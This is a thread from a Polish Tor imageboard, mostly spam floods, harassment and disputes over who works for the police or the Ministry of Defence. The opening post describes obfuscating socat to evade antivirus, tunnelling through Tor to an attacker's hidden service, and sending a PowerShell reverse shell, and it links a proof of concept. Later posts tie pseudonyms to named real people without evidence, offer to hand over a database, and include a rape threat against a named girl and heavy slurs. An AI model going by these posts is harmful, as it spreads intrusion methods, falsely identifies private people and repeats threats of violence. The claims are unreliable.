[ Home / Boards / Banlist / Search / Login / Tor mirror / Overboard / Create / Wiki (BETA) ]

/poland/ - Poland

Catalog

Name
Email
Subject
Comment *
File
* = required field[▶ Show post options & limits]
Options
Password (For file and post deletion.)

Allowed file types:jpg, jpeg, gif, png, mp3, webm, mp4
Max filesize is 32 MB.
Max image dimensions are 10000 x 10000.
You may upload 5 per post.


 No.34937[Last 50 Posts]

File: 1593341919094.jpeg (5.85 KB, 318x159, 2:1, index.jpeg)

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

>Jak rozumiem chilkat jako biblioteka do użycia proxy w klasie WebClient.Tcp? Nie prościej skompilować socata pod cygwinem (zaciemnij kod, socat jest rozpoznwalny przez windefa jako złośliwe narzędzie) i puścic shella po 127.0.0.1:9050 do c&c na jakiś multihandler? Na c&c możesz odpalać różne listenery które automatycznie wykonają polecenia.

Wygrywasz nagrode na pierwsza sensowna wypowiedz polskiego tora xD

przyznaje, z deka to bylo przekombinowane :)

cygwin? krolu zloty… zmieniles moje zycie

Co do socata: skompilowalem na windowsa i zrobilem tunel przez tora do ukrytej uslugi atakujacego

zz listerenem na localhoscie celu wiec odpadli mi privoxy i chilkat, pusc adres portfela btc czy xmr

wynagrodze ci to.

Wyslalem po porstu reverse shella w powershellu na nasluch z sockatowego tunela (u)?

Awesome!!!!

PoC maly ode mnie: https://pastebin.com/GsxgCMDB

Musialem zrobic oddzielna nitke bo Cebulkowi zbijaj posty, bo im zal pizde sciska, ze na cebulce nigdy

nie pojawil sie nigdy zaden PoC.

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl74d8NfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJYLLQP+KuEi78NCB2qLie4OENnXFI5HZm0NfD6ry03ri5eZM1TkxpaFXpw875VR

obA8N9PwYxJczJln4h47D7JAC3pZtfkHBSwoLSuPQdJOmg2OZ/MUNcjN+6Rr/bDU

lPMtx4crt3BzNdAfdiwJ0zrCKT76SrEzbiuL/z1rOivIrHOjYuY=

=AAUq

—–END PGP SIGNATURE—–

 No.34938

vegetka


 No.34939

vegetka 1


 No.34940

vegetka 12


 No.34941

vegetka 20


 No.34942

vegetka 26


 No.34943

vegetka 31


 No.34944

vegetka 36


 No.34945

vegetka 40


 No.34946

vegetka 44


 No.34947

vegetka 47


 No.34949

vegetka


 No.34950

vegetka pies2


 No.34951

vegetka pies13


 No.34952

vegetka pies21


 No.34953

vegetka pies27


 No.34954

vegetka pies32


 No.34955

vegetka pies37


 No.34956

vegetka pies41


 No.34957

vegetka pies45


 No.34958

vegetka pies48


 No.34959

vegetka pies51


 No.34960

vegetka pies54


 No.34961

vegetka pies57


 No.34962

vegetka pies60


 No.34963

vegetka pies63


 No.34964

>Cebulkowi zbijaj posty, bo im zal pizde sciska

Planujemy zająć się tymi ludźmi od strony MSWiA. Zasugerujemy opcję, kiedy oni opuszczą szeregi policji, a Cebulka zniknie, bo to przestarzały model kontrolowania młodocianych, boomerski, kiczowaty jak Jurek Owsiak i nieskuteczny. Centralizacja, kastowość, nachalny dydaktyzm, żenujące prowokacje - to wszystko jest tak przebrzmiałe, a do tego sama obsada kadrowa jest patologiczna. Mamy tam narkomanów, łapówkarzy i ogólnie niezrównoważone jednostki. Ci z kompetencjami już dawno odpłynęli na zieleńsze pastwiska do nas lub naszych kolegów z innych rejonów obronności.

Tutaj na lolifox my z MON mamy setki razy lepsze rezultaty dzięki kompetentnej grupie realizacyjnej sekcji kierowania behawioralnego. W praktyce wykorzystujemy mózgi zmiękczone już przez Rosjan, bo większość naszych działań odwołuje się do popularnych toposów występujących w treściach dezinformacyjnych i propagandowych od służb rosyjskich, już wgranych w umysły tutejszych dzieciaków.

Rosjanie dlatego się czasami tutaj denerwują, bo widzą jak na ich własnym serwerze bierzemy dzieciaki z mózgami już przez nich zmiękczonymi i obracamy je na wektor zgodny z interesami Polski, wszystko oczywiście w oprawie antysystemowości, walki z reżimem, z Kaczorem, z Żydami i całą resztą klasycznych kremlowskich ozdobników kompatybilnych z niestabilną hormonalnie i ograniczoną intelektualnie młodzieżą.

Jeśli uda się skasować Cebulkę, albo przynajmniej odśmiecić kadry z zaćpanych patusów, będziesz miał czyste przedpole do Twoich działań, a niewykluczone będzie też nasze bezpośrednie wsparcie. Na razie staraj się ignorować cebulową żulerię i rób swoje.


 No.34965

vegetka pies66


 No.34966

vegetka pies69


 No.34967

vegetka pies72


 No.34969

vegetka pies74


 No.34970

vegetka pies76


 No.34971

vegetka pies78


 No.34972

vegetka pies80


 No.34973

vegetka pies82


 No.34974

vegetka pies84


 No.34975

vegetka pies86


 No.34976

vegetka pies88


 No.34977

>Cebulkowi zbijaj posty, bo im zal pizde sciska

Planujemy zająć się tymi ludźmi od strony MSWiA. Zasugerujemy opcję, kiedy oni opuszczą szeregi policji, a Cebulka zniknie, bo to przestarzały model kontrolowania młodocianych, boomerski, kiczowaty jak Jurek Owsiak i nieskuteczny. Centralizacja, kastowość, nachalny dydaktyzm, żenujące prowokacje - to wszystko jest tak przebrzmiałe, a do tego sama obsada kadrowa jest patologiczna. Mamy tam narkomanów, łapówkarzy i ogólnie niezrównoważone jednostki. Ci z kompetencjami już dawno odpłynęli na zieleńsze pastwiska do nas lub naszych kolegów z innych rejonów obronności.

Tutaj na lolifox my z MON mamy setki razy lepsze rezultaty dzięki kompetentnej grupie realizacyjnej sekcji kierowania behawioralnego. W praktyce wykorzystujemy mózgi zmiękczone już przez Rosjan, bo większość naszych działań odwołuje się do popularnych toposów występujących w treściach dezinformacyjnych i propagandowych od służb rosyjskich, już wgranych w umysły tutejszych dzieciaków.

Rosjanie dlatego się czasami tutaj denerwują, bo widzą jak na ich własnym serwerze bierzemy dzieciaki z mózgami już przez nich zmiękczonymi i obracamy je na wektor zgodny z interesami Polski, wszystko oczywiście w oprawie antysystemowości, walki z reżimem, z Kaczorem, z Żydami i całą resztą klasycznych kremlowskich ozdobników kompatybilnych z niestabilną hormonalnie i ograniczoną intelektualnie młodzieżą.

Jeśli uda się skasować Cebulkę, albo przynajmniej odśmiecić kadry z zaćpanych patusów, będziesz miał czyste przedpole do Twoich działań, a niewykluczone będzie też nasze bezpośrednie wsparcie. Na razie staraj się ignorować cebulową żulerię i rób swoje.


 No.34978

vegetka pies90


 No.34979

vegetka pies92


 No.34980

vegetka pies94


 No.34982

vegetka pies96


 No.34984

vegetka pies98


 No.34985

vegetka pies100


 No.34986

cwele vegety2


 No.34987

cwele vegety12


 No.34988

cwele vegety20


 No.34989

cwele vegety26


 No.34990

cwele vegety31


 No.34991

cwele vegety36


 No.34992

cwele vegety40


 No.34993

cwele vegety44


 No.34994

cwele vegety47


 No.34995

cwele vegety50


 No.34997

cwele vegety53


 No.34998

cwele vegety56


 No.34999

cwele vegety59


 No.35000

cwele vegety62


 No.35001

cwele vegety65


 No.35002

cwele vegety68


 No.35003

cwele vegety71


 No.35004

cwele vegety73


 No.35005

cwele vegety76


 No.35006

cwele vegety78


 No.35008

cwele vegety80


 No.35009

cwele vegety82


 No.35010

cwele vegety84


 No.35011

cwele vegety86


 No.35012

cwele vegety88


 No.35013

cwele vegety90


 No.35014

cwele vegety92


 No.35015

cwele vegety94


 No.35016

vege vege vege2


 No.35017

vege vege vege12


 No.35018

vege vege vege20


 No.35019

vege vege vege26


 No.35020

vege vege vege31


 No.35021

vege vege vege36


 No.35023

vege vege vege2


 No.35024

vege vege vege11


 No.35026

vege vege vege20


 No.35054

>Wygrywasz nagrode na pierwsza sensowna wypowiedz polskiego tora xD

ale odpisywać coś takiego samemu sobie? o kurwa

>>34964

>Planujemy zająć się tymi ludźmi od strony MSWiA. Zasugerujemy opcję, kiedy oni opuszczą szeregi policji

R.V.Miller = Piotr Konieczny

v1ewer = Adam Haertle

kubuspuchatek = Adam Lange

Krang = Adam Golański


 No.35055

>Cebulkowi zbijaj posty, bo im zal pizde sciska

Planujemy zająć się tymi ludźmi od strony MSWiA. Zasugerujemy opcję, kiedy oni opuszczą szeregi policji, a Cebulka zniknie, bo to przestarzały model kontrolowania młodocianych, boomerski, kiczowaty jak Jurek Owsiak i nieskuteczny. Centralizacja, kastowość, nachalny dydaktyzm, żenujące prowokacje - to wszystko jest tak przebrzmiałe, a do tego sama obsada kadrowa jest patologiczna. Mamy tam narkomanów, łapówkarzy i ogólnie niezrównoważone jednostki. Ci z kompetencjami już dawno odpłynęli na zieleńsze pastwiska do nas lub naszych kolegów z innych rejonów obronności.

Tutaj na lolifox my z MON mamy setki razy lepsze rezultaty dzięki kompetentnej grupie realizacyjnej sekcji kierowania behawioralnego. W praktyce wykorzystujemy mózgi zmiękczone już przez Rosjan, bo większość naszych działań odwołuje się do popularnych toposów występujących w treściach dezinformacyjnych i propagandowych od służb rosyjskich, już wgranych w umysły tutejszych dzieciaków.

Rosjanie dlatego się czasami tutaj denerwują, bo widzą jak na ich własnym serwerze bierzemy dzieciaki z mózgami już przez nich zmiękczonymi i obracamy je na wektor zgodny z interesami Polski, wszystko oczywiście w oprawie antysystemowości, walki z reżimem, z Kaczorem, z Żydami i całą resztą klasycznych kremlowskich ozdobników kompatybilnych z niestabilną hormonalnie i ograniczoną intelektualnie młodzieżą.

Jeśli uda się skasować Cebulkę, albo przynajmniej odśmiecić kadry z zaćpanych patusów, będziesz miał czyste przedpole do Twoich działań, a niewykluczone będzie też nasze bezpośrednie wsparcie. Na razie staraj się ignorować cebulową żulerię i rób swoje.


 No.35062

vege vege vege12


 No.35066

>Wygrywasz nagrode na pierwsza sensowna wypowiedz polskiego tora xD

ale odpisywać coś takiego samemu sobie? o kurwa

>>35055

>Planujemy zająć się tymi ludźmi od strony MSWiA. Zasugerujemy opcję, kiedy oni opuszczą szeregi policji

R.V.Miller = Piotr Konieczny

v1ewer = Adam Haertle

kubuspuchatek = Adam Lange

Krang = Adam Golański


 No.35067

vege vege vege10


 No.35068

vege vege vege19


 No.35069

vege vege vege25


 No.35071

vege vege vege35


 No.35073

vege vege vege39


 No.35075

vege vege vege46


 No.35085

vege vege vege70


 No.35087

vege vege vege75


 No.35088

vege vege vege77


 No.35089

vege vege vege79


 No.35090

vege vege vege81


 No.35092

vege vege vege85


 No.35093

vege vege vege87


 No.35094

vege vege vege89


 No.35095

vege vege vege91


 No.35096

vege vege vege93


 No.35097

vege vege vege95


 No.35098

vege vege vege97


 No.35099

vege vege vege99


 No.35128

Atak Saijaninow, poczujcie sile Vegety x13


 No.35133

Atak Saijaninow, poczujcie sile Vegety x39


 No.35136

Atak Saijaninow, poczujcie sile Vegety x49


 No.35137

Atak Saijaninow, poczujcie sile Vegety x52


 No.35140

Atak Saijaninow, poczujcie sile Vegety x58


 No.35142

Atak Saijaninow, poczujcie sile Vegety x63


 No.35150

>Wygrywasz nagrode na pierwsza sensowna wypowiedz polskiego tora xD

ale odpisywać coś takiego samemu sobie? o kurwa

>>35055

>Planujemy zająć się tymi ludźmi od strony MSWiA. Zasugerujemy opcję, kiedy oni opuszczą szeregi policji

R.V.Miller = Piotr Konieczny

v1ewer = Adam Haertle

kubuspuchatek = Adam Lange

Krang = Adam Golański


 No.35151

Atak Saijaninow, poczujcie sile Vegety x1


 No.35153

Atak Saijaninow, poczujcie sile Vegety x20


 No.35154

Atak Saijaninow, poczujcie sile Vegety x26


 No.35157

Atak Saijaninow, poczujcie sile Vegety x40


 No.35171

Atak Saijaninow, poczujcie sile Vegety x80


 No.35174

Atak Saijaninow, poczujcie sile Vegety x86


 No.35177

>Jeśli uda się skasować Cebulkę, albo przynajmniej odśmiecić kadry z zaćpanych patusów, będziesz miał czyste przedpole do Twoich działań, a niewykluczone będzie też nasze bezpośrednie wsparcie. Na razie staraj się ignorować cebulową żulerię i rób swoje.

Jeżeli odezwie się ktoś z oficjalnej skrzynki mswia to przekażemy większą część bazy cebulki oraz hide z policyjnej podgrupy gr5.


 No.35179

Atak Saijaninow, poczujcie sile Vegety x94


 No.35187

Atak Saijaninow, poczujcie sile Vegety x1


 No.35188

Atak Saijaninow, poczujcie sile Vegety x14


 No.35189

Atak Saijaninow, poczujcie sile Vegety x21


 No.35190

Atak Saijaninow, poczujcie sile Vegety x27


 No.35191

Atak Saijaninow, poczujcie sile Vegety x32


 No.35192

>Wygrywasz nagrode na pierwsza sensowna wypowiedz polskiego tora xD

ale odpisywać coś takiego samemu sobie? o kurwa

>>35177

>Jeżeli odezwie się ktoś z oficjalnej skrzynki mswia to przekażemy większą część bazy cebulki oraz hide z policyjnej podgrupy gr5.

R.V.Miller = Piotr Konieczny

v1ewer = Adam Haertle

kubuspuchatek = Adam Lange

Krang = Adam Golański


 No.35193

Atak Saijaninow, poczujcie sile Vegety x36


 No.35194

Atak Saijaninow, poczujcie sile Vegety x40


 No.35195

Atak Saijaninow, poczujcie sile Vegety x44


 No.35196

Atak Saijaninow, poczujcie sile Vegety x47


 No.35197

Atak Saijaninow, poczujcie sile Vegety x50


 No.35198

Atak Saijaninow, poczujcie sile Vegety x53


 No.35199

Atak Saijaninow, poczujcie sile Vegety x56


 No.35200

Atak Saijaninow, poczujcie sile Vegety x59


 No.35201

Atak Saijaninow, poczujcie sile Vegety x62


 No.35202

Atak Saijaninow, poczujcie sile Vegety x65


 No.35203

Atak Saijaninow, poczujcie sile Vegety x68


 No.35204

>Jeśli uda się skasować Cebulkę, albo przynajmniej odśmiecić kadry z zaćpanych patusów, będziesz miał czyste przedpole do Twoich działań, a niewykluczone będzie też nasze bezpośrednie wsparcie. Na razie staraj się ignorować cebulową żulerię i rób swoje.

Jeżeli odezwie się ktoś z oficjalnej skrzynki mswia to przekażemy większą część bazy cebulki oraz hide z policyjnej podgrupy gr5.

Jesteśmy w posiadaniu danych korelacyjnych które bez problemu pomogą powiązać działalnośc policjantów nadzorujących tzw. darknet tj. umieszczenia materiałów pedofilskich, namawianie do gwałtów, terroryzmu oraz morderstw polskich dygnitarzy z wpisami tzw. "anonów" z portalu lolifox.cc


 No.35205

Atak Saijaninow, poczujcie sile Vegety x1


 No.35206

Atak Saijaninow, poczujcie sile Vegety x13


 No.35207

Atak Saijaninow, poczujcie sile Vegety x21


 No.35208

Atak Saijaninow, poczujcie sile Vegety x1


 No.35209

Atak Saijaninow, poczujcie sile Vegety x15


 No.35210

Atak Saijaninow, poczujcie sile Vegety x23


 No.35211

Atak Saijaninow, poczujcie sile Vegety x29


 No.35212

Atak Saijaninow, poczujcie sile Vegety x34


 No.35213

Atak Saijaninow, poczujcie sile Vegety x48


 No.35214

Atak Saijaninow, poczujcie sile Vegety x51


 No.35215

Atak Saijaninow, poczujcie sile Vegety x45


 No.35217

>Jeżeli odezwie się ktoś z oficjalnej skrzynki mswia

Tak się nigdy nie stanie.

Ale może skontaktować się z Tobą ktoś z MON. Nieoficjalnie, ale z prostą opcją uwierzytelnienia jako MON.


 No.35219

>>35217

Niestety. Tylko oficjalna droga.


 No.35220

Skoro mówisz, że jesteś z MON to nie powinno stanowić problemu skontaktowanie się z nie imiennej skrzynki w domenie mon. Póki co jesteś konfabulantem który z niewiadomych przyczyn podnosi rękę na "kolegów". Może cebulka na wylocie i jest Ci wszystko jedno? Pozdrawiam.


 No.35238

>Skoro mówisz, że jesteś z MON to nie powinno stanowić problemu skontaktowanie się z nie imiennej skrzynki w domenie mon

To byłoby wielkim problemem. Byłoby to pozyskaniem przez ciebie atrybucji. Taka opcja nie wchodzi w grę. Mam nadzieję, że domyślasz się, że potencjalni współpracownicy np. CIA nie dostają maili z @cia.gov i że są inne opcje na nawiązanie owocnego kontaktu z MON?

Na razie obserwujemy jak radzisz sobie z przełamywaniem swoich emocjonalnych więzów z towarzystwem policyjnym. Od współpracowników oczekujemy chłodu emocjonalnego i elastyczności poznawczej.

Nad jednym i drugim jeszcze trochę popracuj.


 No.35242

A świstak siedzi i zawija w te sreberka ;)


 No.35259

>>35204

>Jeżeli odezwie się ktoś z oficjalnej skrzynki mswia to przekażemy większą część bazy cebulki oraz hide z policyjnej podgrupy gr5.

>Jesteśmy w posiadaniu danych korelacyjnych które bez problemu pomogą powiązać działalnośc policjantów nadzorujących tzw. darknet tj. umieszczenia materiałów pedofilskich, namawianie do gwałtów, terroryzmu oraz morderstw polskich dygnitarzy z wpisami tzw. "anonów" z portalu lolifox.cc

R.V.Miller = Piotr Konieczny

v1ewer = Adam Haertle

kubuspuchatek = Adam Lange

Krang = Adam Golański

>>35220

>Skoro mówisz, że jesteś z MON to nie powinno stanowić problemu skontaktowanie się z nie imiennej skrzynki w domenie mon. Póki co jesteś konfabulantem który z niewiadomych przyczyn podnosi rękę na "kolegów". Może cebulka na wylocie i jest Ci wszystko jedno? Pozdrawiam.

Łukasz Jędrzejczak kiedyś był w MON, teraz jest w SKW


 No.35268

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

>Byłoby to pozyskaniem przez ciebie atrybucji.

"dziendobry, jestem z mon ale chcalbym uniknac atrybucji do mon…"

kim trzeba byc, zeby palnac taka bzdure? to tylko cebulkowicze potrafio

od moich wspolpracownikow wymaga sie trzezwosci (doslownie, brak narkotykow, alkoholu), racjonalnego myslenia,

poszanowania intelgiencji wspolpracownikow oraz kordynatorow a nader wszystko umiejetnosci przenikania do srodowisk xDDDD

Wygrywasz konkurs na najbardziej idiotyczna wypowiedz polskiego tora.

To o uniknieciu atrybucji jest naprawde kapitalne xDDDD

Pomine fakt rekrutowania na portalu lolifox.cc w publicznynm watku…

A ic pan w… do domu xD

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl74zk5fFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJY9ewP+IN32gIB/1gQ3+ly7O6nENwQ8eiiDh0xLYmtRqz4g45g8zGnHqlwM6Qrn

NHGBUsv2MDMu6OK0qSjJH37x96tLNuGCkhGi4bi8dEQoZt5S68hJAm2uIGnEtppv

trRs8PeR0GY3ogYzGVqRieDtTHDO/2E7Rvz0XkQcAvCBsTRFHIo=

=iCmz

—–END PGP SIGNATURE—–


 No.35270

>Pomine fakt rekrutowania na portalu lolifox.cc w publicznynm watku

Kiedy zaczniesz poprawnie używać BM, zyskasz szansę na niepubliczną komunikację. Jak na razie pięć moich wiadomości odbiło się od twojego adresu.


 No.35271

>od moich wspolpracownikow wymaga sie trzezwosci (doslownie, brak narkotykow, alkoholu)

Ty wciąż regenerujesz swój mózg po narkotykach. To dyskawlifikuje cię jako wewnętrznego pracownika MON, możesz być najwyżej zasobem zewnętrznym. Też ciekawa robota.


 No.35274

>>35268

>od moich wspolpracownikow wymaga sie trzezwosci (doslownie, brak narkotykow

cześć Ncuxonama, koniec przedstawienia, nastąpiła kompromitacja cwela SKW

>>35270

>Kiedy zaczniesz poprawnie używać BM, zyskasz szansę na niepubliczną komunikację. Jak na razie pięć moich wiadomości odbiło się od twojego adresu.

nie wierzyć w to legendowanie, Jędrzejczak i Vegeta na 1000% rozmawiają prywatnie


 No.35275

>nie wierzyć w to legendowanie, Jędrzejczak i Vegeta na 1000% rozmawiają prywatnie

Nie wierzyć policjantowi-ćpunowi, wprowadzającemu tu chaos i szerzącemu dezinformację.


 No.35276

>>35275

>policjantowi

wkrótce zgwałcę małą Monikę Legowicz moim grubym kutasem, a jak będzie wierzgać to śrubokrętem


 No.35277

>wkrótce zgwałcę małą Monikę Legowicz moim grubym kutasem, a jak będzie wierzgać to śrubokrętem

A tak naprawdę strzepiesz malutkiego wacusia do myszki syberyjskiej, wypijesz najtańsze piwko kupione za ostatnie grosze ukradzione z torebki wychowującej cię samotnej matce, a na koniec poszukasz osiedlowego dilera, by wylizać mu serek spod napleta w zamian za garść suszu roślinnego.


 No.35279

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

>Ty wciąż regenerujesz swój mózg po narkotykach.

Tylko Miller wie, ze juz nie cpam xDDDDDDD

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl740ohfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJYIigP/cCc7Q4k2J0AUxe4RMCuUlBLxxeTRhCkBi821YJHqCIJ63al9Bvq5meTo

TTDPMKHOLwC9PQxLicHFDuA04CW5Dj3/t3oMLgHHmwGiHG1VrNx152JlF7A66PpG

/Tzn5SY+0A6zcXUiueoDr0i7vcXRb8VtlOjM2ktXVD+tuwlciLc=

=zHAV

—–END PGP SIGNATURE—–


 No.35282

>Tylko Miller wie, ze juz nie cpam xDDDDDDD

Nie. Napisałeś to tutaj Ty sam, pisząc, że Ci się zwoje zrastają. Ale o tym, że to napisałeś, już zapomniałeś?

Czekamy na Ciebie z ofertą, ale najpierw zwoje niech Ci się ładnie do końca zrosną.


 No.35283

>Tylko Miller wie, ze juz nie cpam xDDDDDDD

A my, kiedy chcemy, możemy wiedzieć to, co wie Miller.


 No.35284

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

Przypomne:

"dzien dobry, jestem z mon, chcialbym uniknac atrybucji do mon"

Kto tu ma proste zwoje?

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl741M1fFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJaOIwQAiNQqV21KJeSyrS0hTesUdQUztATLpi5lk5Uu8KLm/+stCZ0AhbTEse7c

gKv/++5K6cOphKBzooCwxKTns1V7qK8H5qnLnt782nyxsx5r6mqHY9TVVpdL7S6j

FctLwlpONIxkNcrtlt5ka6QYVlDPj240SJM9c6ctYX3SSoT8pVE=

=V1EP

—–END PGP SIGNATURE—–


 No.35285

>>35282

>Nie. Napisałeś to tutaj Ty sam, pisząc, że Ci się zwoje zrastają. Ale o tym, że to napisałeś, już zapomniałeś?

pogubił się w kłamstwach

>Czekamy na Ciebie z ofertą, ale najpierw zwoje niech Ci się ładnie do końca zrosną.

legendowanie. Vegeta w tej chwili pracuje dla SKW

>>35283

>A my, kiedy chcemy, możemy wiedzieć to, co wie Miller.

R.V.Miller = Piotr Konieczny

>>35284

>Przypomne:

>"dzien dobry, jestem z mon, chcialbym uniknac atrybucji do mon"

Łukasz Jędrzejczak kiedyś był w MON, teraz jest w SKW


 No.35287

>"dzien dobry, jestem z mon, chcialbym uniknac atrybucji do mon"

>Kto tu ma proste zwoje?

Ty.

Pisanie, że jestem z MON, dopóki nie dam na to dowodu, pozostaje dla Ciebie (a przede wszystkim dla naszych gospodarzy zza Buga) właśnie tym: pisaniem.

Więc nie ma żadnej atrybucji.

Ale kiedy wyślę Ci e-maila z konta służbowego z MON, to sytuacja ulega zmianie diametralnej. Taki e-mail nigdy nie powstanie. Na udowodnienie, że Twój rozmóca jest/będzie z MON mamy inne sposoby. Oczywiste, kiedy już je poznasz.


 No.35288

>>35287

>Ty.

>Pisanie, że jestem z MON, dopóki nie dam na to dowodu, pozostaje dla Ciebie (a przede wszystkim dla naszych gospodarzy zza Buga) właśnie tym: pisaniem.

>Więc nie ma żadnej atrybucji.

nie ma żadnej atrybucji że jesteś z MON. bo jesteś z SKW xDDDDDDDDDDDDD


 No.35289

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

Poza tym to jest troche tak jak Jasiu jest z Malgosia para przez 5 lat, rozstaja sie i nagle Jasiu po koejnych trzech mowi:

"Maglosia to glupia kurwa jest, proste zwoje miala, niestabilna i zacpana".

Wlasciwym pytaniem jest:

"to kim ty jestes, ze 5 lat bzykales malgosie?"

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl741nJfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJb6gAP+NpjLb9Pb0CAsrgc0mB1gjm3QgW4MzoEPN86pb/skmfqMomMnB7TW0GK5

hM6ivE9WtmTo3qrx1hOkPmZXbUZ3+UyDqeu8HXStleUWFZidznGOPn5Dgg66viyr

nXLoTqKeLhLU8Hp8HJtIrlQKxYZvkKQi86F51V9I32dFsoWVJLg=

=n1zB

—–END PGP SIGNATURE—–


 No.35290

>nie ma żadnej atrybucji że jesteś z MON. bo jesteś z SKW xDDDDDDDDDDDDD

Sprawdź w Wikipedii jakie są relacje między MON a SKW. Wróć jak zrozumiesz.


 No.35292

>>35290

>Sprawdź w Wikipedii jakie są relacje między MON a SKW. Wróć jak zrozumiesz.

sprawdź czy kiedykolwiek daliśmy się złapać na wasze nieudolne legendowanie. wróc jak zrozumiesz


 No.35294

>sprawdź czy kiedykolwiek daliśmy się złapać na wasze nieudolne legendowanie

Nabieracie się od miesięcy, myślisz że dla czyjej korzyści robicie swoje akcje? Myślisz że czyjej robocie zawdzięczamy przepchnięcie poprzedniej ustawy antyterrorystycznej?


 No.35297

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

Mysle, ze to co robisz jest bez precedensu w dziejach swiatowej policji xDDD

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl742JFfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJbV2QP/TuPD2cM0ExaiBGCIU9tssD1KRvbzmIJAJOAOmCgUEI/e15JXvxfF5hKN

QLX7aMD8serheWqpS5nQ68YBk2+9e4kDCi3j4Uu7onnGLCAFnKKx0Y3WmKpEHgMb

nuTrfBNwsJxrUM6LHwsH0XWD4hPV1Q9rOIPK3USGZLPh0zpD7JI=

=/6tH

—–END PGP SIGNATURE—–


 No.35301

>Mysle, ze to co robisz jest bez precedensu w dziejach swiatowej policji xDDD

Trudno mi to ocenić, nie pracuję w Policji, ani polskiej ani tej światowej.


 No.35304

W mon też nie.


 No.35305

>W mon też nie.

Moim ogólnym pracodawcą jest MON, ale na dokumencie służbowym mam inny skrót. Przelewy z pensją przychodzą z kont MON.


 No.35312

Policyjny szaleniec.


 No.35313

>Policyjny szaleniec.

Tak, jest tu cały czas, pisze boldem, wkleja nazwiska, wszędzie widzi Vegetę.


 No.35314

>35312 >35304

Widziałem ogłoszenie ostatnio że Piotr Konieczny poszukuje pracowników biurowych. Może to to ;)


 No.35323

>>35304

>W mon też nie.

Łukasz Jędrzejczak kiedyś był w MON, teraz jest w SKW


 No.35324

>kiedyś był w MON, teraz jest w SKW

Nie sprawdziłeś w Wikipedii relacji między MON a SKW.


 No.35325

>>35324

>Nie sprawdziłeś w Wikipedii relacji między MON a SKW.

Łukasz Jędrzejczak desperacko próbuje wmówić że jest z MON a nie z SKW xDDD to jest hit


 No.35326

>Łukasz Jędrzejczak desperacko próbuje wmówić że jest z MON a nie z SKW xDDD to jest hit

Hitem jest to, że nie znasz nawet struktury i zadań MON, a wypisujesz tu bzdury.

Pozwól więc, że na oczach wszystkich wytknę ci twoją całkowitą ignorację, i wskażę, że SKW podlega pod Ministra Obrony Narodowej.

Tak więc ośmieszyłeś się przepotężnie, nie wiedząc o tym, że każdy pracownik SKW jest też pracownikiem MON.

Takiego debila i nieuka jak ty Ziemia jeszcze nigdy nie dźwigała.


 No.35327

AD. 35326: Jesteś głupszy. Serio.


 No.35329

>>35326

>Hitem jest to, że nie znasz nawet struktury i zadań MON, a wypisujesz tu bzdury.

>Pozwól więc, że na oczach wszystkich wytknę ci twoją całkowitą ignorację, i wskażę, że SKW podlega pod Ministra Obrony Narodowej.

>Tak więc ośmieszyłeś się przepotężnie, nie wiedząc o tym, że każdy pracownik SKW jest też pracownikiem MON.

>Takiego debila i nieuka jak ty Ziemia jeszcze nigdy nie dźwigała.

stanowisko Łukasza Jędrzejczaka kiedyś: Zastępca Dyrektora Departamentu Nauki i Szkolnictwa Wojskowego, MON

stanowisko Łukasza Jędrzejczaka teraz: Służba Kontrwywiadu Wojskowego

trzask pękającej dupy pokazuje że jednak jest to ważna informacja którą chciał zachować w tajemnicy, a nie tylko formalność


 No.35330

>ważna informacja którą chciał zachować w tajemnicy, a nie tylko formalność

Ależ skąd. Informacja nie jest tajna, bo gdybym chciał ją ukryć, to moje rzeczywiste stanowisko byłoby pod przykrywką, na przykład specjalisty security w Exatel.

